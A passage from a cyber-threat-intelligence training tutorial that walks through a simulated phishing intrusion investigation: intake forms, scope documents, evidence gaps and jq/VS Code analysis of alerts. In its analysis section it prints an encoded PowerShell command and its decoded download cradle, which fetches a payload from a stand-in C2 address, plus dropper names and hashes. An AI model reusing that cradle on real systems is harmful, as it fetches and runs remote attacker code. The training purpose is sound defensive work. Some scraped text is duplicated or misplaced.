project.ymlThis file is the single source of truth for project metadata. Open it now:nano project.ymlThe template has blank fields. Fill every one(During the investigation):project: id: "PROJ-2024-001" name: "LifeTech Pharma — Targeted Intrusion" type: reactive classification: TLP:AMBER status: in-progressanalyst: name: "Your Name" role: "CTI Analyst" contact: "your@email.com"timeline: incident_date: "2024-11-15" detection_date: "2024-11-15" investigation_start: "2024-11-15" report_due: "2024-11-17" # INCD 72h clock - expires 18:47 IST Nov 17pirs: - id: PIR-001 question: "Was the US licensing formula package (SERVER-RD-02\\USPartner2024\\) accessed or exfiltrated? If so, what and when?" priority: high status: open - id: PIR-002 question: "How did the adversary gain initial access - phishing, credential theft, or exploitation?" priority: high status: open - id: PIR-003 question: "Is there evidence of ongoing access or persistence as of investigation date?" priority: high status: openscope: systems: - WS-CFO-01 - WS-IT-LEVI - SERVER-RD-02 - SERVER-FIN-01 - DC01 threat_actor: unknown attck_techniques: [] # leave blank now - fill during R4deliverables: - type: executive-brief status: pending - type: soc-handoff status: pending - type: sigma-rules count: 0 status: pendingnotes: "INCD 72h notification clock starts 2024-11-15 18:47 IST. Legal hold on WS-IT-LEVI - no hardware access, RTR only."Do not leave any field as "" or [] if you know the value. Unknown fields are fine — write unknown explicitly. A blank field means "forgot to fill in." unknown means "we looked and do not know yet."6. Commit the filled metadatagit add project.ymlgit commit -m "PROJ-2024-001: project.yml filled — 3 PIRs, INCD deadline 2024-11-17 18:47 IST, legal hold WS-IT-LEVI"The folder is now named, scoped, and version-controlled. The intake call can begin.Step 0: Intake — What the First Call CapturesBefore opening Splunk, before pivoting on the C2 IP, before forming a hypothesis — the intake call runs. This is 15 minutes with the Tier 2 escalation and the IR Lead before any analysis work begins.The intake captures facts that change what you look for.Open the intake form before dialing:cp intake-form.md 00-scope/intake-2024-11-15.mdnano 00-scope/intake-2024-11-15.mdThe template has 9 sections. Work through them in order during the call — do not paraphrase in real time, write what the reporter says verbatim. You will analyze it after. For LifeTech this call produces:# Investigation Intake — PROJ-2024-001 — 2024-11-15Completed by: On-call CTI analyst (Yael Mizrahi)Intake call with: Noa Ben-David (IR Lead), Ran Katz (SOC Manager)Call time: 2024-11-15 18:55 IST---## 1. What was reported?**1.1 What did you see or receive that caused you to raise this?**"CrowdStrike fired a high-severity behavioral IOA on Michal Cohen's workstation —PowerShell with base64 payload launched directly from Outlook. Tier 1 pulled thenetwork tab and found 3 outbound connections to 203.0.113.87 over the last 15minutes. This is the CFO's machine. We escalated immediately."**1.2 Where did this first come to your attention?**- [x] Alert from SIEM / EDR / AV ← CrowdStrike Falcon behavioral IOA, severity: High**1.3 When did you first notice it?**Date: 2024-11-15 Time: 18:47 Timezone: IST (UTC+2)**1.4 Do you believe the activity is still ongoing?**- [x] Yes — still active (C2 connections still firing at time of call)---## 2. What is already known?**2.1 What systems, accounts, or services appear to be involved?**- WS-CFO-01.lifetechpharma.local — Michal Cohen, CFO. Dell Latitude, Windows 11.- 203.0.113.87 — external IP, destination of C2 connections. Not in any allowlist.- OUTLOOK.EXE (PID 2240) → powershell.exe (PID 3784) — parent-child confirmed.- No other hosts identified yet — investigation is 8 minutes old.**2.2 What was the observed behavior?**"PowerShell with -NonI -W Hidden -Enc flags spawned from Outlook. The encodedcommand has not been decoded yet. Three separate TCP connections to 203.0.113.87on port 443 over 15 minutes — looks like a beacon pattern."**2.3 Has anyone else already investigated or looked into this?**- [x] Yes — Tier 1 analyst (Omer Cohen) ran initial Splunk queries (last 1 hour only). What did they touch: read-only Splunk queries. No changes to the endpoint.**2.4 What do you think happened?**"Probably a phishing email with a malicious attachment — xlsm macro or somethingsimilar. Michal must have opened it in the last few hours. We don't know if anyoneelse was targeted."---## 3. Timeline of discovery**3.1 When do you believe the activity started?**- [ ] Known- [x] Estimated: activity on WS-CFO-01 started approximately 18:42 IST (PowerShell launch timestamp from CrowdStrike event).**3.2 How long do you estimate the activity has been occurring?**Approximately 13 minutes from first PowerShell event to escalation call (18:42–18:55 IST).However: unknown whether this is the beginning of the intrusion or a later stage.**3.3 Is there a specific event that triggered the alert or complaint?**CrowdStrike behavioral IOA fired at 18:42:33 IST on WS-CFO-01. Tier 1 escalatedat 18:47. IR Lead paged at 18:52. Intake call started at 18:55.---## 4. What has already been done?**4.1 Has any system been rebooted, shut down, or reimaged since the activity was discovered?**- [x] No — WS-CFO-01 is still running. Not yet isolated.**4.2 Have any credentials, tokens, or API keys been rotated or revoked?**- [x] No — no credential changes made yet.**4.3 Has any network access been blocked or firewall rules been changed?**- [x] No — 203.0.113.87 has not been blocked. Ran confirmed: "We wanted to check with you first before blocking — didn't want to tip them off."**4.4 Has any malware been deleted or quarantined?**- [x] No — CrowdStrike flagged the process but did not quarantine. Alert status: Detected, not Prevented (policy is set to Detect-only on this machine — CFO exception policy).**4.5 Has anyone notified external parties?**- [x] No — no external notification yet. INCD assessment pending scope confirmation.---## 5. Systems and access**5.1 What logging is expected to exist for the affected systems?**- Endpoint logs (Sysmon, CrowdStrike): [x] Yes — CrowdStrike on WS-CFO-01. Sysmon on WS-CFO-01. NOTE: Sysmon NOT deployed on server-class machines or DC01.- VPN / authentication logs: [x] Yes — Cisco AnyConnect VPN, logs in Splunk.- Database audit logs: [x] Yes — SQL audit on SERVER-RD-02 (partial EIDs only).- Network flow / firewall logs: [x] Yes — Palo Alto NGFW. RETENTION: 14 days only. ⚠ SERVER-RD-02 outbound logs will expire 2024-11-29 for today's traffic.- Email gateway logs: [x] Yes — M365 Message Trace, 30-day retention. ATP enabled. NOTE: ATP sandbox NOT enabled for xlsm files — policy gap identified.- Cloud provider logs: [x] Yes — Azure AD sign-in logs, 30-day retention.**5.2 What tools and access does the analyst have?**- [x] Admin access to affected hosts (CrowdStrike RTR for WS-CFO-01, WS-CFO-01 CrowdStrike console)- [x] Read access to SIEM (Splunk — full org)- [x] Access to EDR console (CrowdStrike Falcon — full org view)- [x] Access to network equipment / firewall logs (Palo Alto Panorama — read only)- [x] Access to cloud console (Azure AD — Security Reader role)- [x] Access to email gateway (M365 Security & Compliance — Message Trace)- [ ] VPN / jump host credentials — not yet, request submitted- [x] TheHive / OpenCTI lab access**5.3 Are there any systems the analyst should NOT touch?**⚠ WS-IT-LEVI (Paz Levi, IT Admin): LEGAL HOLD issued at 20:45 IST today. HR investigation underway — UNRELATED to this incident (employment matter). Hardware access BLOCKED for 48–72 hours per Legal counsel (Adv. Dina Shapiro). Remote CrowdStrike RTR is PERMITTED — confirmed by Legal. No memory image, no disk image, no physical access until hold lifted.---## 6. Business impact**6.1 What business processes are affected or at risk?**"The CFO's email and workstation are involved. If this is a full compromise, financedata is at risk. We also have R&D server SERVER-RD-02 — it holds the formula filesfor the US licensing deal. That deal closes in 6 weeks. If those files were touched,we have an FDA NDA issue and a $52M deal at risk."**6.2 Is customer data, employee data, or regulated data potentially involved?**- [x] Yes — type: proprietary formula files under FDA NDA filing (USPartner2024 package, 47 files, ~380 MB). Also: employee financial data on SERVER-FIN-01 if CFO path extended to finance server.**6.3 What is the financial exposure if this is confirmed?**Direct deal risk: $52M US licensing agreement. Regulatory exposure: Israeli PrivacyProtection Law (PPL) fines + FDA NDA breach penalties. Reputational exposure: USpartner disclosure obligation if formula data confirmed exfiltrated.**6.4 Is there a hard deadline driving this investigation?**- [x] Yes — deadline: INCD 72-hour notification window starts from discovery of breach (not discovery of alert). If formula data or critical infrastructure involvement confirmed: clock starts NOW → expires 2024-11-17 ~18:47 IST.---## 7. Regulatory and legal constraints**7.1 Are there applicable notification requirements?**| Regulation | Applicable? | Deadline | Notified? ||---|---|---|---|| INCD (Israeli critical infrastructure) | TBD — assess after scope confirmed | 72h from discovery | No || Biometric Database Authority | No — no biometric data at LifeTech | — | N/A || BoI-CD 362 (Israeli financial) | No — LifeTech is not a financial entity | — | N/A || GDPR | TBD — EU customers in export data? | 72h from awareness | No || PCI-DSS | No — no card processing at LifeTech | — | N/A || Israeli Privacy Protection Law | Yes — employee + partner data in scope | Per PPL — notify DPA if breach confirmed | No || FDA / NDA obligation | Yes — if formula files confirmed exfiltrated | Immediate notification to US partner | No |**7.2 Is there an active legal hold on any systems or data?**- [x] Yes — WS-IT-LEVI (Paz Levi). Legal hold issued 2024-11-15 20:45 IST. Contact: Adv. Dina Shapiro (Legal). Hold expected: 48–72 hours minimum.**7.3 Has legal counsel been notified?**- [x] Yes — Adv. Dina Shapiro notified of the security incident at 19:10 IST. Advised: do not touch WS-IT-LEVI hardware. RTR permitted with logging.---## 8. Analyst notes(Raw notes taken during call — unprocessed)- Ran (SOC): "The CFO is still at the office. We haven't told her yet. Should we?" → IR Lead decision: do not inform CFO until after memory dump. Risk: she might reboot the machine.- The CrowdStrike policy on WS-CFO-01 is DETECT-ONLY (CFO exception policy). This is why the process was not killed automatically. SOC should evaluate moving to Prevent for exec machines after this incident.- 203.0.113.87 — not blocklisted anywhere in org. Ran says: "It's clean on our end, never seen it before." Worth enriching immediately (VirusTotal, Shodan).- Memory dump of WS-CFO-01 is urgent — C2 is still active. Process may have network artifact or decrypted payload in memory. Action: RTR memory dump NOW.- No mention of SERVER-RD-02 during this call — IR Lead is not aware of the formula file risk yet. Will scope that separately after evidence inventory.- p.levi (WS-IT-LEVI) is under HR investigation for unrelated reason. Legal hold is coincidental. However: IT admin access + legal hold + security incident creates a complex situation. Document carefully.---## 9. Next actions| # | Action | Owner | Due ||---|---|---|---|| 1 | Take memory dump of WS-CFO-01 via CrowdStrike RTR before C2 session ends | Yael (CTI) | Immediate || 2 | Enrich 203.0.113.87 — VirusTotal, Shodan, passive DNS, ASN lookup | Yael (CTI) | Within 30 min || 3 | Pull M365 Message Trace for m.cohen last 48h — identify delivery vector | Omer (Tier 1) | Within 30 min || 4 | Retrieve Palo Alto firewall logs for WS-CFO-01 and SERVER-RD-02 — full available window | Ran (SOC) | Within 1h ⚠ retention risk || 5 | Check Azure AD sign-in logs for m.cohen and p.levi — last 30 days | Yael (CTI) | Within 1h || 6 | Confirm SERVER-RD-02 USPartner2024 directory access — pull EID 4663 from Splunk | Yael (CTI) | Within 2h || 7 | Open TheHive case PROJ-2024-001, attach this intake as first observable | Yael (CTI) | Within 30 min || 8 | Advise IR Lead on INCD 72h clock — confirm if formula data scope triggers mandatory notification | Noa (IR Lead) + Legal | Within 2h |---*Intake completed 2024-11-15 19:18 IST. File saved as 00-scope/intake-2024-11-15.md.**Case opened in TheHive: PROJ-2024-001.*```Two items in this intake change the entire investigation trajectory: the legal hold on `WS-IT-LEVI` (you cannot image it), and the potential for formula data in scope (Israeli PPL + FDA notification obligations). Both need to be on the table before analysis starts, not discovered mid-investigation.The intake commits to git first:Two items in this intake change the entire investigation trajectory: the legal hold on WS-IT-LEVI (you cannot image it), and the potential for formula data in scope (Israeli PPL + FDA notification obligations). Both need to be on the table before analysis starts, not discovered mid-investigation.The intake commits to git first:git add 00-scope/intake-2024-11-15.mdgit commit -m "PROJ-001: intake — CFO PowerShell alert, legal hold on WS-IT-LEVI, formula data in scope"Step 1–2: Project Setup and ScopeThe folder and git repo already exist from Step 00. This step fills the scope document and gets stakeholder sign-off before any analysis begins. The rule: you do not start looking at logs until the scope is committed.1. Open the scope documentnano 00-scope/scope.md# Intelligence Source Registry**Project:** PROJ-2024-001 — LifeTech Pharma Targeted IntrusionAdmiralty Scale: Source reliability A (completely reliable) – F (reliability cannot be judged). Information reliability: 1 (confirmed) – 6 (truth cannot be judged).---## Internal Sources| ID | Source | Type | Admiralty | Notes ||---|---|---|---|---|| INT-001 | Splunk SIEM | Log aggregation | A/2 | Primary forensic source; full org scope; read-only access. Initial 1h Splunk query by Tier 1 (Omer Cohen) — covered WS-CFO-01 only. || INT-002 | CrowdStrike Falcon | EDR / endpoint telemetry | A/2 | Deployed on WS-CFO-01, WS-IT-LEVI. NOT deployed on R&D server fleet (12 servers) or DC01. CFO machine on Detect-only policy (not Prevent). || INT-003 | Palo Alto NGFW (Panorama) | Firewall flows / NetFlow | A/2 | Read-only. 14-day retention. ⚠ SERVER-RD-02 Nov 6 outbound flows expire 2024-11-20 — retrieve before any other task. || INT-004 | M365 Message Trace | Email gateway logs | A/2 | 30-day retention. ATP sandbox NOT enabled for .xlsm files — phishing attachment delivered uninspected. || INT-005 | Azure AD sign-in logs | Cloud authentication | A/2 | 30-day retention. Security Reader role. Covers m.cohen and p.levi sign-in history. || INT-006 | Sysmon (WS-CFO-01, WS-IT-LEVI) | Endpoint process/network telemetry | A/2 | NOT deployed on server-class machines (SERVER-RD-02, SERVER-FIN-01, DC01). || INT-007 | Windows Security event logs (DC01, SERVER-RD-02) | Authentication / authorization | A/2 | DC01: partial export only — full log inaccessible. EID 4662 (DCSync) and EID 4663 (object access) relevant. || INT-008 | SQL audit — SERVER-RD-02 | Database object-access audit | A/2 | Partial EIDs only; not all object-access events captured. Required for PIR-001 (formula file access). || INT-009 | Cisco AnyConnect VPN | VPN session logs | A/2 | Available in Splunk. Covers p.levi sessions (AiTM hypothesis). |---## External / OSINT Sources| ID | Source | Type | Admiralty | TLP | Notes ||---|---|---|---|---|---|| EXT-001 | CERT-IL | Government advisory | A/2 | TLP:AMBER | Check for active advisories targeting Israeli pharma sector. || EXT-002 | VirusTotal | IOC enrichment | C/3 | TLP:WHITE | Immediate priority: 203.0.113.87 hash/IP lookup. Crowdsourced — treat as corroborating only. || EXT-003 | Shodan | Infrastructure recon | C/3 | TLP:WHITE | 203.0.113.87 ASN / infrastructure / open-port lookup. || EXT-004 | URLScan.io | Domain analysis | C/3 | TLP:WHITE | Passive DNS and domain history for C2 domains identified in flows. || EXT-005 | MISP | Community threat intel | B/3 | TLP:AMBER | Pharma sector sharing. Cross-reference IOCs against community feed. |---## Source Limitations| Source | Known Limitation ||---|---|| Palo Alto NGFW (INT-003) | 14-day retention only. SERVER-RD-02 Nov 6 outbound flows expire **2024-11-20** — retrieve immediately, before any other analysis. || CrowdStrike Falcon (INT-002) | Not deployed on R&D server fleet (12 servers) or DC01. No EDR telemetry for those hosts — Windows Security events and NGFW logs are the only visibility. || Sysmon (INT-006) | Not deployed on server-class machines (SERVER-RD-02, SERVER-FIN-01, DC01). Process creation and network telemetry unavailable for those hosts. || Windows Security / DC01 (INT-007) | Only partial event log export available; full log is inaccessible. Analytical confidence on DC01 activity is reduced. || M365 ATP (INT-004) | Sandbox not enabled for .xlsm attachments. The suspected phishing attachment was delivered without detonation — no ATP verdict available. || SQL audit — SERVER-RD-02 (INT-008) | Partial EIDs only. Not all object-access events are captured. Absence of a log entry does NOT confirm file was not accessed. || WS-IT-LEVI — all sources | Legal hold issued 2024-11-15 20:45 IST (Adv. Dina Shapiro). No hardware, disk, or memory image permitted. CrowdStrike RTR allowed with full session logging. Re-assess after hold lifted (est. 48–72h). || Azure AD sign-in logs (INT-005) | 30-day retention. Historical data before approximately 2024-10-15 is unavailable. || M365 Message Trace (INT-004) | 30-day retention. Historical data before approximately 2024-10-15 is unavailable. || VirusTotal (EXT-002) | Crowdsourced; vendor detections may be absent for fresh infrastructure. A clean VT result does not rule out malicious use. Treat as corroborating, not authoritative. |The template has six sections. Fill each one now:Header — fill the four metadata lines at the top:Project: PROJ-2024-001Classification: TLP:AMBERDate scoped: 2024-11-15Scoped by: [your name]Approved by: Noa Ben-David, IR LeadIncident Summary — one paragraph, what triggered this:CrowdStrike behavioral detection on WS-CFO-01 at 18:42 IST, November 15, 2024.PowerShell spawned by OUTLOOK.EXE with base64-encoded payload, downloading from203.0.113.87. Scope of compromise unknown. Formula files on SERVER-RD-02 arepotentially in scope — US licensing deal ($52M) requires regulatory assessment.In Scope — fill the asset table:Out of Scope — fill the exclusion table:PIRs — copy from project.yml, add due dates:Constraints and Assumptions — fill the four fields:Legal/regulatory: INCD 72h notification window expires 2024-11-17 18:47 IST. Israeli Privacy Protection Law + FDA NDA obligations if formula data confirmed.Evidence limitations: Palo Alto firewall logs — 14-day retention. SERVER-RD-02 Nov 6 outbound logs expire 2024-11-20. Retrieve immediately. Sysmon absent from all server-class machines.Access restrictions: WS-IT-LEVI — legal hold, no hardware access. RTR permitted.Assumptions: All timestamps assumed UTC unless marked IST. Not converted in log excerpts.Definition of Done — check the boxes your team has agreed to:- [ ] All PIRs answered or formally deferred with reasoning- [ ] Timeline covers full attacker dwell period (or gap documented)- [ ] ATT&CK mapping reviewed and finalized- [ ] At least one detection rule per confirmed TTP- [ ] SOC handoff delivered and acknowledged- [ ] Executive brief approved by Noa Ben-David (IR Lead)- [ ] INCD notification filed if formula data confirmedFull scope.md:# Scope Definition**Project:** PROJ-2024-001**Classification:** TLP:AMBER**Date scoped:** 2024-11-15**Scoped by:** Yael Mizrahi (CTI Analyst)**Approved by:** Noa Ben-David (IR Lead) — verbal approval 19:22 IST---## Incident SummaryCrowdStrike behavioral IOA fired on WS-CFO-01 (Michal Cohen, CFO) at 18:42 IST on2024-11-15. PowerShell with encoded payload launched from OUTLOOK.EXE; three outboundC2 connections to 203.0.113.87 confirmed within 15 minutes of detection. Scope ofcompromise is unknown at time of scoping — the CFO alert may be a late-stage indicatorof a broader intrusion. Formula files on SERVER-RD-02 (US licensing package, ~380 MB,47 files) are in scope for PIR-001 due to financial and regulatory exposure ($52M deal,FDA NDA obligations). INCD 72h notification clock assessed as active from time ofdiscovery.---## In Scope| Asset / System | Owner | Justification ||---|---|---|| WS-CFO-01.lifetechpharma.local | IT Dept / Michal Cohen (CFO) | Triggering alert host — CrowdStrike IOA, active C2 || WS-IT-LEVI.lifetechpharma.local | IT Dept / Paz Levi (IT Admin) | Suspected initial access vector — AiTM phishing hypothesis || SERVER-RD-02.lifetechpharma.local | R&D Dept | Formula file storage — PIR-001 primary asset || SERVER-FIN-01.lifetechpharma.local | Finance Dept | Lateral movement target — confirmed by CrowdStrike alert Nov 15 || DC01.lifetechpharma.local | IT Dept | DCSync event EID 4662 observed from non-DC IP || Exchange Online (M365) | IT / Microsoft | Email delivery vector — phishing investigation || Azure AD | IT / Microsoft | Authentication logs — VPN session token replay || Palo Alto NGFW (perimeter) | IT / Network team | C2 traffic confirmation, SERVER-RD-02 exfil flows |---## Out of Scope| Asset / System | Reason for Exclusion ||---|---|| SharePoint Online / OneDrive | Cloud scope — no evidence of involvement; requires separate authorization || Manufacturing SCADA / OT network | No evidence of lateral movement into OT segment at this time || WS-IT-LEVI — hardware / disk image | Legal hold issued 2024-11-15 20:45 IST. No hardware access until hold lifted. RTR permitted. || All other endpoints (838 total) | Out of scope pending hunt results — may expand if pivot on C2 domains finds new hosts |---## Priority Intelligence Requirements (PIRs)| ID | Question | Priority | Due | Status ||---|---|---|---|---|| PIR-001 | Was the US licensing formula package (`SERVER-RD-02\LicenseDeals\USPartner2024\`) accessed or exfiltrated? If so, what and when? | High | 2024-11-16 06:00 IST | Open || PIR-002 | How did the adversary gain initial access — phishing, credential theft, exploitation, or insider? | High | 2024-11-16 06:00 IST | Open || PIR-003 | Is there evidence of ongoing access or persistence as of 2024-11-15 19:00 IST? Are any other hosts compromised? | High | 2024-11-16 06:00 IST | Open |---## Constraints and Assumptions- **Legal/regulatory:** INCD 72h notification window — expires approximately 2024-11-17 18:47 IST. Israeli Privacy Protection Law (PPL) notification to DPA if personal data breach confirmed. FDA NDA obligation to notify US partner if formula files confirmed exfiltrated — no specific deadline but immediate notification is standard practice.- **Evidence limitations:** - Palo Alto NGFW firewall flows: 14-day retention only. SERVER-RD-02 November 6 outbound traffic expires 2024-11-20. **Retrieve before any other analysis.** - Sysmon NOT deployed on server-class machines (SERVER-RD-02, SERVER-FIN-01, DC01). - CrowdStrike NOT deployed on R&D server fleet (12 servers) or DC01. - DC01 Windows Security log: only partial export available — full log inaccessible. - ATP sandbox not enabled for .xlsm files — attachment was delivered uninspected.- **Access restrictions:** - WS-IT-LEVI: legal hold, no hardware/disk/memory access. CrowdStrike RTR permitted with full session logging. Contact Adv. Dina Shapiro before any exception. - VPN jump host credentials: requested, not yet provisioned (Yael Mizrahi, 19:05 IST).- **Assumptions:** - All log timestamps assumed UTC unless explicitly marked IST in source. - CrowdStrike behavioral detections treated as CONFIRMED source (Admiralty A/2). - Sysmon EID events treated as CONFIRMED source where forwarder health is verified.---## Stakeholders| Name | Role | Involvement ||---|---|---|| Noa Ben-David | IR Lead | Scope approval; receives executive brief; INCD notification decision || Ran Katz | SOC Manager | SOC handoff; implements detection rules; hunting queries || Adv. Dina Shapiro | Legal Counsel | Legal hold oversight; PPL / regulatory notifications; WS-IT-LEVI access decisions || [CISO name] | CISO | Executive brief recipient; $52M deal brief to Board || [US Partner contact] | External — US biopharma | FDA NDA notification if PIR-001 answered YES |---## Definition of DoneThis investigation is complete when:- [ ] All three PIRs answered or formally deferred with documented reasoning- [ ] Timeline covers full attacker dwell period from first access to detection (or gap documented)- [ ] ATT&CK mapping completed and reviewed — all confirmed techniques have a gap type- [ ] At least one Sigma detection rule per confirmed TTP with Rule Missing or Coverage Incomplete gap- [ ] SOC handoff document delivered to Ran Katz and acknowledged- [ ] Executive brief approved by Noa Ben-David (IR Lead)- [ ] INCD notification filed if formula data or CII involvement confirmed (deadline: 2024-11-17 18:47 IST)- [ ] PPL / FDA NDA notification decision documented (even if decision is: not required)- [ ] project.yml status set to `closed` and all PIR statuses updated2. Save the file and commitgit add 00-scope/scope.mdgit commit -m "PROJ-2024-001: scope signed off — 5 systems, 3 PIRs, INCD deadline 2024-11-17, firewall log retrieval urgent"The firewall log retention deadline drives everything. SERVER-RD-02’s November 6 outbound traffic expires November 20. That is the exfiltration confirmation window. If it closes, CL-003 becomes INFERRED, not CONFIRMED. Retrieve those logs before any other analysis.Step R1: Evidence Inventory — What Exists and What Is MissingThe evidence inventory runs before analysis. The rule: you do not analyze what you have not inventoried.1. Open the source registrynano 02-sources/source-registry.mdThe template has two tables: Internal Sources and External Sources. Fill every row you have access to — and explicitly mark what is absent. Unknown coverage is not the same as no coverage.2. Fill in what you haveFor each log source, fill four fields: Source name, System(s) it covers, Admiralty reliability rating, and any known gap. Where a source is absent from a system that should have it, add a row with — absent in the Gap column. That absence is a finding.For LifeTech, the completed source registry drives this inventory:GAP-001 — WS-IT-LEVI Sysmon: October 22 — November 1, 2024Duration: 10 daysRoot cause: Unknown — Sysmon forwarder stopped. Coincides exactly with the day the IT admin received a phishing email.What is missing: process creation (EID 1), network connections (EID 3), file creation (EID 11) for this host during this entire window.Impact: Cannot confirm or rule out attacker activity on WS-IT-LEVI between Oct 22 and Nov 1. All claims about this period are INFERRED or HYPOTHESIZED unless supported by alternative sources (VPN logs, DC authentication logs, firewall flows).Possible cause: Deliberate anti-forensic technique — terminating Sysmon service is a known evasion method.The 10-day gap on the IT admin workstation starts the same day a phishing email was delivered to him. This is not coincidence — it is a finding.3. Create a GAP document for every gapEach gap gets its own file. Create it now:nano 01-evidence/GAP-001-ws-it-levi-sysmon.mdPaste the filled template:# GAP-001 — WS-IT-LEVI Sysmon | 2024-10-22 – 2024-11-01Duration: 10 days (2024-10-22 11:31 UTC to 2024-11-01 09:14 UTC)Root cause: Sysmon forwarder stopped. Coincides exactly with delivery of phishing email to p.levi at 11:23 UTC.What is missing: EID 1 (process creation), EID 3 (network connections), EID 11 (file creation) for WS-IT-LEVI during this entire window.Impact: Cannot confirm or rule out attacker activity during this period. All claims covering Oct 22–Nov 1 on this host are INFERRED or HYPOTHESIZED unless corroborated by VPN logs, DC auth logs, or firewall flows.Possible cause: Deliberate - terminating Sysmon is T1562.001 (Impair Defenses). A gap coinciding with a malicious delivery is itself a finding, not merely an absence.4. Commit the evidence inventorygit add 01-evidence/ 02-sources/source-registry.mdgit commit -m "PROJ-2024-001: evidence inventory — 6 sources, GAP-001 (10-day Sysmon gap WS-IT-LEVI Oct 22–Nov 1), firewall log retrieval urgent before Nov 20"Step R1.5: Hands-On Evidence Analysis — VS Code InvestigationThe evidence inventory tells you what exists. This step analyzes it. VS Code is the primary tool: one window holds the evidence tree, the formatted logs, the API calls, and the terminal — no context-switching between applications.Setup — Open the Evidence Folder# One command opens the entire evidence directory as a workspacecode ~/investigations/lifetech-2024-11/01-evidence/VS Code opens with the Explorer panel showing the full evidence tree. Every JSON, JSONL, CSV, and syslog file is one click away.Install four extensions before starting (Ctrl+Shift+X, search by ID):Or install all at once from the integrated terminal (Ctrl+`` ):code --install-extension mechatroner.rainbow-csvcode --install-extension humao.rest-clientcode --install-extension ms-vscode.hexeditorcode --install-extension esbenp.prettier-vscodeKey VS Code shortcuts used throughout this step:Download the training evidence:git clone https://github.com/anpa1200/CTI_as_a_Code.gitcode ~/CTI_as_a_Code/investigations/lifetech-2024-11/01-evidence/Direct links to open any file in GitHub (also downloadable via curl -L):m365/message-trace-p.levi.csvFormat: CSVContains: IT admin phishing delivery, Oct 15–24m365/message-trace-m.cohen.csvFormat: CSVContains: CFO phishing delivery, Nov 13–15azure-ad/signin-p.levi.jsonFormat: JSONContains: IT admin Azure AD sign-ins — Istanbul token replayvpn/anyconnect-2024-10-24.logFormat: ASA syslogContains: VPN session from Istanbul, Oct 24sysmon/WS-CFO-01-sysmon.jsonlFormat: JSONLContains: CFO workstation — PowerShell, LSASS, persistence, BITScrowdstrike/WS-CFO-01-alert-20241115.jsonFormat: JSONContains: CrowdStrike Falcon alert — triggering detectionwindows-security/DC01-security.jsonlFormat: JSONLContains: DC01 security events — DCSync EID 4662windows-security/SERVER-RD-02-security.jsonlFormat: JSONLContains: R&D server — EID 4663 file access, EID 5156 exfilpalo-alto/ngfw-flows.csvFormat: CSVContains: Perimeter firewall flows — 381 MB exfil confirmedpalo-alto/dns-queries.csvFormat: CSVContains: DNS telemetry — C2 beacon patternsql-audit/SERVER-RD-02-sql-audit.jsonlFormat: JSONLContains: SQL Server audit — full xp_cmdshell exfil chainGAP-001-ws-it-levi-sysmon.mdFormat: MarkdownContains: Documented 10-day Sysmon gap on IT admin host1. CrowdStrike Alert — JSON in VS CodeIn VS Code Explorer: click crowdstrike/WS-CFO-01-alert-20241115.jsonPress Shift+Alt+F to auto-format. The nested structure becomes readable with collapsible sections.Open the Outline panel (Ctrl+Shift+O):▶ meta▼ resources ▼ [0] ▶ device — hostname, OS, groups ▼ behaviors [0] Execution / T1059.001 — OUTLOOK.EXE → powershell.exe [1] Command and Control / T1071.001 [2] Persistence / T1547.001 [3] Credential Access / T1003.001 ▶ network_accesses ▶ prevention_policyClick any node to jump directly to that section. Click prevention_policy — you see "prevent": false immediately. The CFO's machine is in detect-only mode; the C2 connection is live. Take the memory dump before anything else.Search (Ctrl+F): type prevented → jumps to "prevent": false. Type cmdline → jumps to the encoded PowerShell command.Or use jq tool:Extract key fields in the integrated terminal (Ctrl+`` ):jq '.resources[0] | { detection_id, severity: .max_severity_displayname, host: .device.hostname, prevented: .prevention_policy.prevent, timestamp: .created_timestamp}' crowdstrike/WS-CFO-01-alert-20241115.jsonOutput:{ "detection_id": "ldt:8f2a4b91e33a471cae44b2fdb8812201:884921003", "severity": "Critical", "host": "WS-CFO-01", "prevented": false, "timestamp": "2024-11-15T16:42:47.882Z"}# List all detected behaviorsjq '.resources[0].behaviors[] | { timestamp, tactic, technique_id, display_name, parent: .parent_image_filename, image: .filename, cmdline: (.cmdline // "" | .[0:80])}' crowdstrike/WS-CFO-01-alert-20241115.json# Network connections observedjq '.resources[0].network_accesses[] | { remote_address, remote_port, direction, timestamp}' crowdstrike/WS-CFO-01-alert-20241115.json# Prevention policy — confirm detect-only mode and note the policy gapjq '.resources[0].prevention_policy | {name, prevent, detect, note}' \ crowdstrike/WS-CFO-01-alert-20241115.jsonFound IOCsHost WS-CFO-01 — Victim workstation; CrowdStrike detect-only, C2 activeHash (SHA256) de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1848474f57 — powershell.exe behavior hash from alertHash (MD5) 7353f60b1739074eb17c5f4dddefe239 — Same behavior; use both for VT lookupProcess OUTLOOK.EXE → powershell.exe — Parent–child execution chain in behaviors[0]Cmdline -NonI -W Hidden -Enc JABjAD0A… — Encoded PowerShell payload; decode in Step 2IP 203.0.113.87 — C2 server; 3 connections in network_accesses, port 4432. Decode the PowerShell PayloadIn the formatted JSON still open in VS Code, press Ctrl+F and search -Enc — the base64 argument is on the same line. Copy it.Decode in the integrated terminal — do not paste encoded malware into online decoders:# PowerShell -Enc uses UTF-16LE encodingecho "JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAYwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJwBNAG8AegBpAGwAbABhAC8ANQAuADAAJwApADsAJABkAD0AJABjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMgAwADMALgAwAC4AMQAxADMALgA4ADcALwB1AHAAZABhAHQAZQAnACkA" \ | base64 -dOutput:$c=New-Object System.Net.WebClient;$c.Headers.Add('User-Agent','Mozilla/5.0');$d=$c.DownloadString('https://203.0.113.87/update')In VS Code Explorer: click sysmon/WS-CFO-01-sysmon.jsonl. Press Ctrl+F, search "EventID": 11 — jumps to the file creation event showing svchost32.exe dropped to AppData\Roaming. The analyst_note field confirms the fake PE timestamp.# Cross-check: confirm what the PowerShell droppedjq 'select(.EventID == 11) | { time: .TimeCreated, dropped_by: .Image, file: .TargetFilename, note: .analyst_note}' sysmon/WS-CFO-01-sysmon.jsonlOr use Base64 extention:Found IOCsIP 203.0.113.87 — Primary C2 server; payload download sourceURL https://203.0.113.87/update — C2 payload URL decoded from base64 PowerShellFile svchost32.exe — Dropper deposited to %AppData%\Roaming\; forged PE timestamp3. M365 Message Trace — Rainbow CSVIn VS Code Explorer: click 